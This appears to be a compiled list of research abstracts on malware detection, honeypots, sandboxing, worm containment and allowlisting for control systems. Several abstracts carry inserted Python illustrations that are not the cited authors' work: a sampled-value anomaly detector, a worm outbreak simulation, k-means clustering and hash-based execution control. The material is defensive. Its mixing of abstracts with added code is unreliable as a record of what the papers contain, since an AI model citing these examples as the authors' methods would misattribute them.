    Youssef, Tarek; El Hariri, Mohammad; Habib, Hani

    Secure high-speed communication is required to ensure proper operation of complex power grid systems and prevent malicious tampering activities. In this paper, artificial neural networks with temporal dependency are introduced for false data identification and mitigation for broadcast IEC 61850 SMV messages. The fast responses of such intelligent modules in intrusion detection make them suitable for time-critical applications, such as protection. However, care must be taken in selecting the appropriate intelligence model and decision criteria. As such, this paper presents a customizable malware script to sniff and manipulate SMV messages and demonstrates the ability of the malware to trigger false positives in the neural network's response. The malware developed is intended to act as a vaccine to harden the intrusion detection system against data manipulation attacks by enhancing the neural network's ability to learn and adapt to these attacks.

  2. Anti-malware software and medical devices.

    PubMed

    2010-10-01

    Just as much as healthcare information systems, medical devices need protection against cybersecurity threats. Anti-malware software can help safeguard the devices in your facility, but it has limitations and even risks. Find out what steps you can take to manage anti-malware applications on your devices.

  3. DARKDROID: Exposing the Dark Side of Android Marketplaces

    DTIC Science & Technology

    2016-06-01

    Moreover, our approaches can detect apps containing both intentional and unintentional vulnerabilities, such as unsafe code loading mechanisms and...Security, Static Analysis, Dynamic Analysis, Malware Detection , Vulnerability Scanning 16. SECURITY CLASSIFICATION OF: 17. LIMITATION OF ABSTRACT UU 18...applications in a DoD context. ................... 1 1.2.2 Develop sophisticated whole-system static analyses to detect malicious Android applications

  4. Design and Implementation of High Interaction Client Honeypot for Drive-by-Download Attacks

    NASA Astrophysics Data System (ADS)

    Akiyama, Mitsuaki; Iwamura, Makoto; Kawakoya, Yuhei; Aoki, Kazufumi; Itoh, Mitsutaka

    Nowadays, the number of web-browser-targeted attacks that lead users to adversaries' web sites and exploit web browser vulnerabilities is increasing, and a clarification of their methods and countermeasures is urgently needed. In this paper, we introduce the design and implementation of a new client honeypot for drive-by-download attacks that has the capacity to detect and investigate a variety of malicious web sites. On the basis of the problems of existing client honeypots, we enumerate the requirements of a client honeypot: 1) detection accuracy and variety, 2) collection variety, 3) performance efficiency, and 4) safety and stability. We improve our system with regard to these requirements. The key features of our developed system are stepwise detection focusing on exploit phases, multiple crawler processing, tracking of malware distribution networks, and malware infection prevention. Our evaluation of the developed system in a laboratory experiment and a field experiment indicated that its detection variety and crawling performance are higher than those of existing client honeypots. In addition, our system is able to collect information for countermeasures and is secure and stable for continuous operation. We conclude that our system can investigate malicious web sites comprehensively and support countermeasures.

  5. A Security Monitoring Framework For Virtualization Based HEP Infrastructures

    NASA Astrophysics Data System (ADS)

    Gomez Ramirez, A.; Martinez Pedreira, M.; Grigoras, C.; Betev, L.; Lara, C.; Kebschull, U.; ALICE Collaboration

    2017-10-01

    High Energy Physics (HEP) distributed computing infrastructures require automatic tools to monitor, analyze and react to potential security incidents. These tools should collect and inspect data such as resource consumption, logs and sequence of system calls for detecting anomalies that indicate the presence of a malicious agent. They should also be able to perform automated reactions to attacks without administrator intervention. We describe a novel framework that accomplishes these requirements, with a proof of concept implementation for the ALICE experiment at CERN. We show how we achieve a fully virtualized environment that improves the security by isolating services and Jobs without a significant performance impact. We also describe a collected dataset for Machine Learning based Intrusion Prevention and Detection Systems on Grid computing. This dataset is composed of resource consumption measurements (such as CPU, RAM and network traffic), logfiles from operating system services, and system call data collected from production Jobs running in an ALICE Grid test site and a big set of malware samples. This malware set was collected from security research sites. Based on this dataset, we will proceed to develop Machine Learning algorithms able to detect malicious Jobs.

  6. Software analysis in the semantic web

    NASA Astrophysics Data System (ADS)

    Taylor, Joshua; Hall, Robert T.

    2013-05-01

    Many approaches in software analysis, particularly dynamic malware analysis, benefit greatly from the use of linked data and other Semantic Web technology. In this paper, we describe AIS, Inc.'s Semantic Extractor (SemEx) component from the Malware Analysis and Attribution through Genetic Information (MAAGI) effort, funded under DARPA's Cyber Genome program. The SemEx generates OWL-based semantic models of high- and low-level behaviors in malware samples from system call traces generated by AIS's introspective hypervisor, IntroVirtTM. Within MAAGI, these semantic models were used by modules that cluster malware samples by functionality, and construct "genealogical" malware lineages. Herein, we describe the design, implementation, and use of the SemEx, as well as the C2DB, an OWL ontology used for representing software behavior and cyber-environments.

  7. Randomized Prediction Games for Adversarial Machine Learning.

    PubMed

    Rota Bulo, Samuel; Biggio, Battista; Pillai, Ignazio; Pelillo, Marcello; Roli, Fabio

    In spam and malware detection, attackers exploit randomization to obfuscate malicious data and increase their chances of evading detection at test time, e.g., malware code is typically obfuscated using random strings or byte sequences to hide known exploits. Interestingly, randomization has also been proposed to improve security of learning algorithms against evasion attacks, as it results in hiding information about the classifier to the attacker. Recent work has proposed game-theoretical formulations to learn secure classifiers, by simulating different evasion attacks and modifying the classification function accordingly. However, both the classification function and the simulated data manipulations have been modeled in a deterministic manner, without accounting for any form of randomization. In this paper, we overcome this limitation by proposing a randomized prediction game, namely, a noncooperative game-theoretic formulation in which the classifier and the attacker make randomized strategy selections according to some probability distribution defined over the respective strategy set. We show that our approach allows one to improve the tradeoff between attack detection and false alarms with respect to the state-of-the-art secure classifiers, even against attacks that are different from those hypothesized during design, on application examples including handwritten digit recognition, spam, and malware detection.

  8. Malware distributed collection and pre-classification system using honeypot technology

    NASA Astrophysics Data System (ADS)

    Grégio, André R. A.; Oliveira, Isabela L.; Santos, Rafael D. C.; Cansian, Adriano M.; de Geus, Paulo L.

    2009-04-01

    Malware has become a major threat in recent years due to the ease of spread through the Internet. Malware detection has become difficult with the use of compression, polymorphic methods and techniques to detect and disable security software. Those and other obfuscation techniques pose a problem for detection and classification schemes that analyze malware behavior. In this paper we propose a distributed architecture to improve malware collection using different honeypot technologies to increase the variety of malware collected. We also present a daemon tool developed to grab malware distributed through spam and a pre-classification technique that uses antivirus technology to separate malware into generic classes.

  9. Essays on Information Assurance: Examination of Detrimental Consequences of Information Security, Privacy, and Extreme Event Concerns on Individual and Organizational Use of Systems

    ERIC Educational Resources Information Center

    Park, Insu

    2010-01-01

    The purpose of this study is to explore systems users' behavior on IS under the various circumstances (e.g., email usage and malware threats, online communication at the individual level, and IS usage in organizations). Specifically, the first essay develops a method for analyzing and predicting the impact category of malicious code, particularly…

  10. Statistical fingerprinting for malware detection and classification

    DOEpatents

    Prowell, Stacy J.; Rathgeb, Christopher T.

    2015-09-15

    A system detects malware in a computing architecture with an unknown pedigree. The system includes a first computing device having a known pedigree and operating free of malware. The first computing device executes a series of instrumented functions that, when executed, provide a statistical baseline that is representative of the time it takes the software application to run on a computing device having a known pedigree. A second computing device executes a second series of instrumented functions that, when executed, provides an actual time that is representative of the time the known software application runs on the second computing device. The system detects malware when there is a difference in execution times between the first and the second computing devices.

  11. Building and Vegetation Rasterization for the Three-dimensional Wind Field (3DWF) Model

    DTIC Science & Technology

    2010-12-01

    Maps API. By design, JavaScript limits access to local resources. This is done to protect against the execution of malicious code. However, ActiveX ...to only use these types of objects ( ActiveX or XPCOM) from a trusted source in order to minimize the exposure of a computer system to malware...Microsoft ActiveX . There is also a need to restructure and rethink the implementation of the JavaScript code. It would be desirable to save the digitized

  12. Evaluation of Malware Target Recognition Deployed in a Cloud-Based Fileserver Environment

    DTIC Science & Technology

    2012-03-01

    many of these detection techniques could be evaded with simple obfuscation. Kolter and Maloof extend Schultz’s research in [KM04] and [KM06]. Their...69 [KM04] Jeremy Z. Kolter and Marcus A. Maloof. Learning to detect malicious executables in the wild. In Proceedings of the tenth ACM SIGKDD...international conference on Knowledge discovery and data mining, KDD ’04, pages 470–478, New York, NY, USA, 2004. ACM. [KM06] J.Z. Kolter and M.A. Maloof

  13. Tools for Large-Scale Mobile Malware Analysis

    DOE Office of Scientific and Technical Information (OSTI.GOV)

    Bierma, Michael

    Analyzing mobile applications for malicious behavior is an important area of research, and is made difficult, in part, by the increasingly large number of applications available for the major operating systems. There are currently over 1.2 million apps available in both the Google Play and Apple App stores (the respective official marketplaces for the Android and iOS operating systems) [1, 2]. Our research provides two large-scale analysis tools to aid in the detection and analysis of mobile malware. The first tool we present, Andlantis, is a scalable dynamic analysis system capable of processing over 3000 Android applications per hour. Traditionally, Android dynamic analysis techniques have been relatively limited in scale due to the computational resources required to emulate the full Android system to achieve accurate execution. Andlantis is the most scalable Android dynamic analysis framework to date, and is able to collect valuable forensic data, which helps reverse-engineers and malware researchers identify and understand anomalous application behavior. We discuss the results of running 1261 malware samples through the system, and provide examples of malware analysis performed with the resulting data. While techniques exist to perform static analysis on a large number of applications, large-scale analysis of iOS applications has been relatively small scale due to the closed nature of the iOS ecosystem, and the difficulty of acquiring applications for analysis. The second tool we present, iClone, addresses the challenges associated with iOS research in order to detect application clones within a dataset of over 20,000 iOS applications.

  14. A study of malware detection on smart mobile devices

    NASA Astrophysics Data System (ADS)

    Yu, Wei; Zhang, Hanlin; Xu, Guobin

    2013-05-01

    The growing use of smart mobile devices for everyday applications has stimulated the spread of mobile malware, especially on popular mobile platforms. As a consequence, malware detection becomes ever more critical in sustaining the mobile market and providing a better user experience. In this paper, we review existing malware and detection schemes. Using real-world malware samples with known signatures, we evaluate four popular commercial anti-virus tools, and our data shows that these tools can achieve high detection accuracy. To deal with new malware with unknown signatures, we study anomaly-based detection using a decision tree algorithm. We evaluate the effectiveness of our detection scheme using malware and legitimate software samples. Our data shows that the detection scheme using a decision tree can achieve a detection rate up to 90% and a false positive rate as low as 10%.

  15. Sandbox for Mac Malware v 1.0

    DOE Office of Scientific and Technical Information (OSTI.GOV)

    Walkup, Elizabeth

    This software is an analyzer for automated sandbox analysis of malware on the OS X operating system. It runs inside an OS X virtual machine to collect data about what happens when a given file is opened or run. As of August 2014, there was no sandbox software for Mac OS X malware, as it requires different methods from those used on the Windows OS (which most sandboxes are written for). This software adds OS X analysis capabilities to an existing open-source sandbox, Cuckoo Sandbox (http://cuckoosandbox.org/), which previously only worked for Windows. The analyzer itself can take many different types of files as input: the traditional Mach-O and FAT executables, .app files, zip files, Python scripts, Java archives, and web pages, as well as PDFs and other documents. While the file is running, the analyzer also simulates rudimentary human interaction with clicks and mouse movements in order to bypass the tests some malware use to see if they are being analyzed. The analyzer outputs several different kinds of data: function call traces, network captures, screenshots, and all created and modified files. This work also includes a static analysis Cuckoo module for Mach-O binary files. It extracts file structures, code library imports and exports, and signatures. This data can be used along with the analyzer results to create signatures for malware.

  16. Countering Insider Threats - Handling Insider Threats Using Dynamic, Run-Time Forensics

    DTIC Science & Technology

    2007-10-01

    able to handle the security policy requirements of a large organization containing many decentralized and diverse users, while being easily managed... contained in the TIF folder. Searching for any text string and sorting is supported also. The cache index file of Internet Explorer is not changed... containing thousands of malware software signatures. Separate datasets can be created for various classifications of malware such as encryption software

  17. Timing to Block Scanning Malwares by Using Combinatorics Proliferation Model

    NASA Astrophysics Data System (ADS)

    Omote, Kazumasa; Shimoyama, Takeshi; Torii, Satoru

    One of the worst threats present in an enterprise network is the propagation of "scanning malware" (e.g., scanning worms and bots). It is important to prevent such scanning malware from spreading within an enterprise network, and especially important to suppress an infection to no more than a few infected hosts. We estimated the timing at which containment software must block "scanning malware" in a homogeneous enterprise network. The "combinatorics proliferation model", based on discrete mathematics and developed in this study, derives a threshold on the number of packets sent by a victim that must not be exceeded if the number of infected hosts is to be kept to a few. This model appropriately expresses the early state in which an infection starts. The result from our model fits very well with the result of a computer simulation using a typical existing scanning malware and an actual network.
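    An added worked illustration of the threshold idea, using a simple early-stage branching-process approximation rather than the paper's combinatorics model: each victim gets at most T scan packets before containment blocks it, every packet hits a vulnerable host with probability V/A, so the expected outbreak size is 1/(1 - T*V/A) and the largest budget T that keeps the expected size below k hosts follows directly. A small Monte Carlo simulation of a homogeneous network checks the approximation. The address space size and vulnerable population are constructed values.

```python
import math
import random


def expected_outbreak_size(packets_per_victim, address_space, vulnerable_hosts):
    """Early-stage branching-process approximation (this example's, not the paper's
    combinatorics model). Each victim sends T scan packets before it is blocked; each
    packet hits a vulnerable host with probability p = V/A, so a victim causes m = T*p
    secondary infections on average and the expected total outbreak size is 1/(1 - m).
    m >= 1 is supercritical: the bound no longer holds and the worm takes the network."""
    m = packets_per_victim * vulnerable_hosts / address_space
    return math.inf if m >= 1 else 1.0 / (1.0 - m)


def max_packets_per_victim(address_space, vulnerable_hosts, max_infected):
    """Largest packet budget T with expected_outbreak_size(T) < max_infected,
    i.e. the per-host threshold the containment software has to enforce."""
    p = vulnerable_hosts / address_space
    bound = (1.0 - 1.0 / max_infected) / p     # size < k  <=>  T*p < 1 - 1/k
    return max(math.ceil(bound) - 1, 0)


def simulate_outbreak(address_space, vulnerable_hosts, packets_per_victim, rng):
    """Discrete simulation of a homogeneous network: every infected host scans uniformly
    random addresses and is cut off after packets_per_victim packets.
    Returns the number of hosts infected when the outbreak stops."""
    vulnerable = set(rng.sample(range(address_space), vulnerable_hosts))
    patient_zero = min(vulnerable)
    infected, pending = {patient_zero}, [patient_zero]
    while pending:
        pending.pop()
        for _ in range(packets_per_victim):
            target = rng.randrange(address_space)
            if target in vulnerable and target not in infected:
                infected.add(target)
                pending.append(target)
    return len(infected)


def mean_outbreak_size(address_space, vulnerable_hosts, packets_per_victim, runs=200, seed=1):
    rng = random.Random(seed)
    total = sum(simulate_outbreak(address_space, vulnerable_hosts, packets_per_victim, rng)
                for _ in range(runs))
    return total / runs


if __name__ == "__main__":
    # Constructed enterprise: a /16 with 256 vulnerable hosts; goal: fewer than 3 infected.
    A, V, K = 65536, 256, 3
    T = max_packets_per_victim(A, V, K)
    print("block each host after", T, "packets; expected outbreak size",
          round(expected_outbreak_size(T, A, V), 2))
    print("simulated mean at T:", mean_outbreak_size(A, V, T),
          " at 4T:", mean_outbreak_size(A, V, 4 * T, runs=5))
```

    For the constructed /16 with 256 vulnerable hosts the budget comes out at 170 packets per host; raising it to four times that crosses the critical point T*V/A = 1 and the simulated outbreak reaches essentially the whole vulnerable population, which is why the blocking threshold matters far more than the exact detection signature.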

  18. Android Malware Classification Using K-Means Clustering Algorithm

    NASA Astrophysics Data System (ADS)

    Hamid, Isredza Rahmi A.; Syafiqah Khalid, Nur; Azma Abdullah, Nurul; Rahman, Nurul Hidayah Ab; Chai Wen, Chuah

    2017-08-01

    Malware is designed to gain access to or damage a computer system without the user noticing, and attackers also exploit malware to commit crime or fraud. This paper proposes an Android malware classification approach based on the K-Means clustering algorithm. We evaluate the proposed model in terms of accuracy using machine learning algorithms. Two datasets were selected to demonstrate the use of K-Means clustering: the VirusTotal and Malgenome datasets. We classify the Android malware into three clusters: ransomware, scareware and goodware. Nine features were considered for each dataset: Lock Detected, Text Detected, Text Score, Encryption Detected, Threat, Porn, Law, Copyright and Moneypak. We used IBM SPSS Statistics software for clustering and the WEKA tools to evaluate the built clusters. The proposed K-Means clustering approach shows promising results, with high accuracy when tested using the Random Forest algorithm.
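    An added illustration of the clustering step, not the paper's SPSS/WEKA pipeline: Lloyd's k-means over the nine features named above, run on constructed feature vectors rather than VirusTotal or Malgenome records, with a deterministic farthest-first initialization so the result is reproducible, and a centroid-inspection step that names each cluster. The thresholds used to name clusters are this example's assumptions.

```python
# The nine features named in the abstract, in a fixed order; values are 0/1 flags
# except text_score, kept in [0, 1].
FEATURES = ["lock_detected", "text_detected", "text_score", "encryption_detected",
            "threat", "porn", "law", "copyright", "moneypak"]

# Constructed feature vectors (not VirusTotal or Malgenome records). The name prefixes
# are only used afterwards to check what the unsupervised step produced.
SAMPLE_APPS = {
    "ransom_a": [1, 1, 0.9, 1, 1, 0, 1, 0, 1],
    "ransom_b": [1, 0, 0.8, 1, 1, 0, 0, 0, 1],
    "ransom_c": [1, 1, 0.7, 1, 0, 0, 1, 1, 1],
    "scare_a":  [0, 1, 0.9, 0, 1, 1, 1, 1, 0],
    "scare_b":  [0, 1, 0.8, 0, 1, 1, 0, 1, 0],
    "scare_c":  [0, 1, 1.0, 0, 1, 0, 1, 1, 0],
    "good_a":   [0, 0, 0.0, 0, 0, 0, 0, 0, 0],
    "good_b":   [0, 0, 0.1, 0, 0, 0, 0, 0, 0],
    "good_c":   [0, 0, 0.0, 1, 0, 0, 0, 0, 0],   # legitimate use of crypto
}


def sq_dist(a, b):
    return sum((x - y) ** 2 for x, y in zip(a, b))


def farthest_first_init(points, k):
    """Deterministic seeding: start at the first point, then repeatedly take the point
    farthest from all chosen centers (no random restarts, so runs are reproducible)."""
    centers = [list(points[0])]
    while len(centers) < k:
        centers.append(list(max(points, key=lambda p: min(sq_dist(p, c) for c in centers))))
    return centers


def kmeans(points, k, max_iter=100):
    """Lloyd's algorithm: assign each point to its nearest center, recompute centers as
    cluster means, stop when the assignment no longer changes."""
    centers = farthest_first_init(points, k)
    assignment = None
    for _ in range(max_iter):
        new_assignment = [min(range(k), key=lambda j: sq_dist(p, centers[j])) for p in points]
        if new_assignment == assignment:
            break
        assignment = new_assignment
        for j in range(k):
            members = [p for p, a in zip(points, assignment) if a == j]
            if members:                       # an empty cluster keeps its old center
                centers[j] = [sum(col) / len(members) for col in zip(*members)]
    return centers, assignment


def label_cluster(center):
    """Name a cluster from its centroid (thresholds are this example's assumption):
    lock screen plus MoneyPak demand reads as ransomware, threatening text as scareware."""
    f = dict(zip(FEATURES, center))
    if f["lock_detected"] > 0.5 and f["moneypak"] > 0.5:
        return "ransomware"
    if f["text_detected"] > 0.5 and f["threat"] > 0.5:
        return "scareware"
    return "goodware"


def classify_apps(apps, k=3):
    names = list(apps)
    centers, assignment = kmeans([apps[n] for n in names], k)
    grouped = {}
    for name, a in zip(names, assignment):
        grouped.setdefault(label_cluster(centers[a]), set()).add(name)
    return grouped


if __name__ == "__main__":
    for label, members in sorted(classify_apps(SAMPLE_APPS).items()):
        print(label, sorted(members))
```

    Note that k-means on its own only produces unnamed groups; the naming step inspects centroids, and an app that legitimately uses encryption (good_c) still lands with the goodware because none of the extortion features accompany it.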

  19. Elevating Virtual Machine Introspection for Fine-Grained Process Monitoring: Techniques and Applications

    ERIC Educational Resources Information Center

    Srinivasan, Deepa

    2013-01-01

    Recent rapid malware growth has exposed the limitations of traditional in-host malware-defense systems and motivated the development of secure virtualization-based solutions. By running vulnerable systems as virtual machines (VMs) and moving security software from inside VMs to the outside, the out-of-VM solutions securely isolate the anti-malware…

  20. Non-developmental item computer systems and the malicious software threat

    NASA Technical Reports Server (NTRS)

    Bown, Rodney L.

    1991-01-01

    The following subject areas are covered: a DOD development system - the Army Secure Operating System; non-development commercial computer systems; security, integrity, and assurance of service (SI and A); post delivery SI and A and malicious software; computer system unique attributes; positive feedback to commercial computer systems vendors; and NDI (Non-Development Item) computers and software safety.

  1. Implications of Aggregated DoD Information Systems for Information Assurance Certification and Accreditation

    DTIC Science & Technology

    2010-01-01

    offshoring, or producing major software components overseas (Defense Science Board, 2009). These trends raise concerns about the level of trust that...7 Software Complexity...7 Increasing Software Vulnerabilities and Malware Population . . . . . . . . . . . . . . . . 9 Limitations of

  2. Real Time Network Monitoring and Reporting System

    ERIC Educational Resources Information Center

    Massengale, Ricky L., Sr.

    2009-01-01

    With the ability of modern system developers to develop intelligent programs that allow machines to learn, modify and evolve themselves, current reactionary methods of detecting and eradicating malicious software code from infected machines are proving to be too costly. Addressing malicious software after an attack is the current methodology…

  3. Cybersim: geographic, temporal, and organizational dynamics of malware propagation

    DOE Office of Scientific and Technical Information (OSTI.GOV)

    Santhi, Nandakishore; Yan, Guanhua; Eidenbenz, Stephan

    2010-01-01

    Cyber-infractions into a nation's strategic security envelope pose a constant and daunting challenge. We present the modular CyberSim tool, which has been developed in response to the need to realistically simulate, at a national level, software vulnerabilities and the resulting malware propagation in online social networks. The CyberSim suite (a) can generate realistic scale-free networks from a database of geocoordinated computers to closely model social networks arising from personal and business email contacts and online communities; (b) maintains for each host a list of installed software, along with the latest published vulnerabilities; (d) allows designated initial nodes where malware gets introduced; (e) simulates, using distributed discrete event-driven technology, the spread of malware exploiting a specific vulnerability, with packet delay and user online behavior models; (f) provides a graphical visualization of the spread of infection, its severity, businesses affected etc. to the analyst. We present sample simulations on a national level network with millions of computers.

  4. Memory Analysis of the KBeast Linux Rootkit: Investigating Publicly Available Linux Rootkit Using the Volatility Memory Analysis Framework

    DTIC Science & Technology

    2015-06-01

    examine how a computer forensic investigator/incident handler, without specialised computer memory or software reverse engineering skills, can successfully...memory images and malware, this new series of reports will be directed at those who must analyse Linux malware-infected memory images. The skills...disable 1287 1000 1000 /usr/lib/policykit-1-gnome/polkit-gnome-authentication-agent-1 1310 1000 1000 /usr/lib/pulseaudio/pulse/gconf-helper 1350

  5. Binary CFG Rebuilt of Self-Modifying Codes

    DTIC Science & Technology

    2016-10-03

    Report date 04-10-2016; final report covering 12 May 2014 to 11 May 2016. ...virus software based on binary signatures. A popular method in industry to analyze malware is a dynamic analysis in a sandbox. Alternatively, we apply a hybrid method combining concolic testing (dynamic symbolic...

  6. Building a Trusted Path for Applications Using COTS Components

    DTIC Science & Technology

    2004-11-01

    against attacks by malicious software. Trojan horse programs, i.e., programs with additional hidden, often malicious, functions, are more and more...cannot be imitated by untrusted software." Wiseman et al. (1988) propose a user interface for the SMITE system to prevent Trojan horses from...input, two of which can also be used for the hologram service. 7.0 CONCLUSION Trojan horse programs, i.e., programs with additional hidden, often

  7. Exe-Guard Project

    DOE Office of Scientific and Technical Information (OSTI.GOV)

    Smith, Rhett; Marshall, Tim; Chavez, Adrian

    The exe-Guard Project is an alliance between Dominion Virginia Power (DVP), Sandia National Laboratories (SNL), Dartmouth University, and Schweitzer Engineering Laboratories (SEL); SEL is the primary recipient on this project. The exe-Guard project was selected for award under DE-FOA-0000359 with CFDA number 81.122 to address Topic Area of Interest 4: Hardened Platforms and Systems. The project developed an antivirus solution for control system embedded devices to prevent the execution of unauthorized code and maintain settings and configuration integrity: a white list antivirus solution for control systems capable of running on embedded Linux® operating systems. White list antivirus methods allow only credible programs to run, through the use of digital signatures and hash functions. Once a system's secure state is baselined, white list antivirus software denies deviations from that state, because the installation of malicious code changes the hash results. Black list antivirus software has been effective in traditional IT environments but has negative implications for control systems. Black list antivirus uses pattern matching and behavioral analysis to identify system threats while relying on regular updates to the signature file and recurrent system scanning. It is vulnerable to zero-day exploits which have not yet been incorporated into a signature file update, and system scans hamper the performance of high availability applications, as revealed in NIST Special Publication 1058, which summarizes the impact of black list antivirus on control systems: manual or "on-demand" scanning has a major effect on control processes in that it takes CPU time needed by the control process (sometimes close to 100% of CPU time). Minimizing the antivirus software throttle setting will reduce but not eliminate this effect.
    Signature updates can also take up to 100% of CPU time, but for a much shorter period than a typical manual scan. Control systems are vulnerable to performance losses if off-the-shelf black list antivirus solutions are not implemented with care; this investment in configuration, in addition to constant decommissioning to perform manual signature file updates, is unprecedented and impractical. Additionally, control systems are often disconnected or islanded from the network, making the delivery of signature updates difficult. The exe-Guard project developed a white list antivirus solution that mitigates the above drawbacks and allows control systems to cost-effectively apply malware protection while maintaining high reliability. The application of security patches can also be minimized, since white listing maintains constant defense against unauthorized code execution; security patches can instead be applied at less frequent intervals where system decommissioning can be scheduled and planned for. Since control systems are less dynamic than IT environments, maintaining a secure baselined state is more practical, and because upgrades are performed at infrequent, calculated intervals, a new security baseline can be established before the system is returned to service. Exe-Guard built on the efforts of SNL under the Code Seal project, in which SNL demonstrated prototype Trust Anchors: independent monitoring and control devices that can be integrated into untrustworthy components. The exe-Guard team started with the lessons learned under that project and then designed a commercial solution for white list malware protection. Malware is a real threat even on islanded or un-networked installations, since operators can unintentionally install infected files, plug in infected mass storage devices, or infect a piece of equipment on the islanded local area network that can then spread to other connected equipment.
    Protection at the device level is one of the last layers of defense in a defense-in-depth model before an asset becomes compromised. This project provided a non-destructive intrusion, isolation and automated response solution, achieving a goal of the Department of Energy (DOE) Roadmap to Secure Control Systems. It also addressed CIP-007 R4, which requires asset owners to employ malicious software prevention tools on assets within the electronic security perimeter. In addition, the CIP-007 R3 requirement for security patch management is reduced in scope, because white listing narrows the impact of vulnerabilities and patch releases. The exe-Guard Project completed all tasks identified in the statement of project objectives and identified additional tasks within scope that were performed and completed within the original budget. The cost share was met and all deliverables were successfully completed and submitted on time. Most importantly, the technology developed and commercialized under this project has been adopted by the energy sector, and thousands of devices with exe-Guard technology integrated in them have now been deployed and are protecting our power systems today.
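    An added example of the white list mechanism described above, not exe-Guard's own code: hash every file of a baselined image into a manifest, authenticate the manifest so an attacker cannot substitute an allowlist that blesses their own binaries, and deny execution of anything absent from or differing from the baseline. The device image, file contents and the HMAC key are constructed stand-ins; a product signs the manifest with a vendor key of which the device holds only the public half, rather than a shared HMAC key.

```python
import hashlib
import hmac

# Constructed stand-in for the embedded device's filesystem: path -> contents.
BASELINE_IMAGE = {
    "/usr/bin/relayctl": b"\x7fELF...relay control daemon v1.0",
    "/usr/bin/modbusd": b"\x7fELF...modbus server v2.3",
    "/etc/relay.conf": b"trip_threshold=1.2\nlog=/var/log/relay.log\n",
}
# Same image after an infected USB stick was plugged in: one binary replaced, one dropped in /tmp.
COMPROMISED_IMAGE = dict(BASELINE_IMAGE)
COMPROMISED_IMAGE["/usr/bin/modbusd"] = b"\x7fELF...modbus server v2.3 plus reverse shell"
COMPROMISED_IMAGE["/tmp/.dropper"] = b"\x7fELF...dropper"

# Assumption: an HMAC key stands in for the vendor's signing key so the example runs offline.
MANIFEST_KEY = b"example-only-manifest-key"


def build_manifest(image):
    """Baseline: SHA-256 of every file that may execute or that holds settings."""
    return {path: hashlib.sha256(data).hexdigest() for path, data in image.items()}


def serialize_manifest(manifest):
    return "".join("%s  %s\n" % (digest, path) for path, digest in sorted(manifest.items())).encode()


def sign_manifest(manifest, key):
    body = serialize_manifest(manifest)
    return body, hmac.new(key, body, hashlib.sha256).hexdigest()


def manifest_is_authentic(body, tag, key):
    expected = hmac.new(key, body, hashlib.sha256).hexdigest()
    return hmac.compare_digest(expected, tag)


def load_manifest(body, tag, key):
    """Refuse an allowlist that was not produced with the key: otherwise an attacker simply
    ships a manifest that lists the hashes of their own binaries."""
    if not manifest_is_authentic(body, tag, key):
        raise ValueError("manifest authentication failed")
    manifest = {}
    for line in body.decode().splitlines():
        digest, path = line.split("  ", 1)
        manifest[path] = digest
    return manifest


def check_execution(path, data, manifest):
    """Exec-time decision: only files whose hash matches the baseline may run."""
    expected = manifest.get(path)
    if expected is None:
        return "deny: not in baseline"
    if not hmac.compare_digest(hashlib.sha256(data).hexdigest(), expected):
        return "deny: hash mismatch"
    return "allow"


def audit_image(image, manifest):
    """Whole-image drift report: the cheap periodic check that replaces a black list scan."""
    current = build_manifest(image)
    return {
        "modified": sorted(p for p in current if p in manifest and current[p] != manifest[p]),
        "added": sorted(p for p in current if p not in manifest),
        "missing": sorted(p for p in manifest if p not in current),
    }


def demo():
    body, tag = sign_manifest(build_manifest(BASELINE_IMAGE), MANIFEST_KEY)
    trusted = load_manifest(body, tag, MANIFEST_KEY)
    decisions = {p: check_execution(p, d, trusted) for p, d in COMPROMISED_IMAGE.items()}
    return decisions, audit_image(COMPROMISED_IMAGE, trusted), tag


if __name__ == "__main__":
    decisions, drift, _ = demo()
    for path, verdict in sorted(decisions.items()):
        print("%-22s %s" % (path, verdict))
    print("drift:", drift)
```

    The exec-time check is a hash comparison with no signature database to update and no full scan, which is the performance property the abstract contrasts with black list scanning; the manifest itself is the thing that must be protected, so it is authenticated before any entry of it is trusted.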

  8. Improving Remote Voting Security with CodeVoting

    NASA Astrophysics Data System (ADS)

    Joaquim, Rui; Ribeiro, Carlos; Ferreira, Paulo

    One of the major problems that prevents the spread of elections with the possibility of remote voting over electronic networks, also called Internet voting, is the use of unreliable client platforms, such as the voter's computer and the Internet infrastructure connecting it to the election server. A computer connected to the Internet is exposed to viruses, worms, Trojans, spyware, malware and other threats that can compromise the election's integrity. For instance, it is possible to write a virus that changes the voter's vote to a predetermined vote on election day. Another possible attack is the creation of a fake election web site where the voter uses a malicious vote program on the web site that manipulates the voter's vote (phishing/pharming attack). Such attacks may not disturb the election protocol, and therefore can remain undetected in the eyes of the election auditors.

  9. Sandia National Laboratories: Malware Technical Exchange Meeting (MTEM)

    Science.gov Websites


  10. IT Security Support for Spaceport Command and Control System

    NASA Technical Reports Server (NTRS)

    McLain, Jeffrey

    2013-01-01

    During the fall 2013 semester, I worked at the Kennedy Space Center as an IT Security Intern in support of the Spaceport Command and Control System under the guidance of the IT Security Lead Engineer. Some of my responsibilities included assisting with security plan documentation collection, system hardware and software inventory, and malicious code and malware scanning. Throughout the semester, I had the opportunity to work on a wide range of security related projects. However, there are three projects in particular that stand out. The first project I completed was updating a large interactive spreadsheet that details the SANS Institute's Top 20 Critical Security Controls. My task was to add in all of the new commercial off-the-shelf (COTS) software listed on the SANS website that can be used to meet their Top 20 controls. In total, there are 153 unique security tools listed by SANS that meet one or more of their 20 controls. My second project was the creation of a database that will allow my mentor to keep track of the work done by the contractors that report to him in a more efficient manner by recording events as they occur throughout the quarter. Lastly, I expanded upon a security assessment of the Linux machines being used on center that I began last semester. To do this, I used a vulnerability and configuration tool that scans hosts remotely through the network and presents the user with an abundance of information detailing each machine's configuration. The experience I gained from working on each of these projects has been invaluable, and I look forward to returning in the spring semester to continue working with the IT Security team.

  11. Using Malware Analysis to Tailor SQUARE for Mobile Platforms

    DTIC Science & Technology

    2014-11-01

    identification data (SIM card and International Mobile Station Equipment Identity Number [IMEI]) to duplicate the phone in another device so that it can...applications. Key logging software can be used to steal passwords for financial websites and credit card information [Sophos 2014]. Data theft...for consumption. Apple provides a limited set of APIs and provides the iTunes store as the only ave- nue to install new software. All software

  12. SHI(EL)DS: A Novel Hardware-Based Security Backplane to Enhance Security with Minimal Impact to System Operation

    DTIC Science & Technology

    2008-03-01

    executables. The current roadblock to detecting Type I Malware consistently is the practice of legitimate software, such as antivirus programs, using this... Software Security Systems . . 31 3.2.2 Advantages of Hardware . . . . . . . . . . . . . 32 3.2.3 Trustworthiness of Information . . . . . . . . . 33...Towards a Hardware Security Backplane . . . . . . . . . 42 IV. Review of State of the Art Computer Security Solutions . . . . . 46 4.1 Software

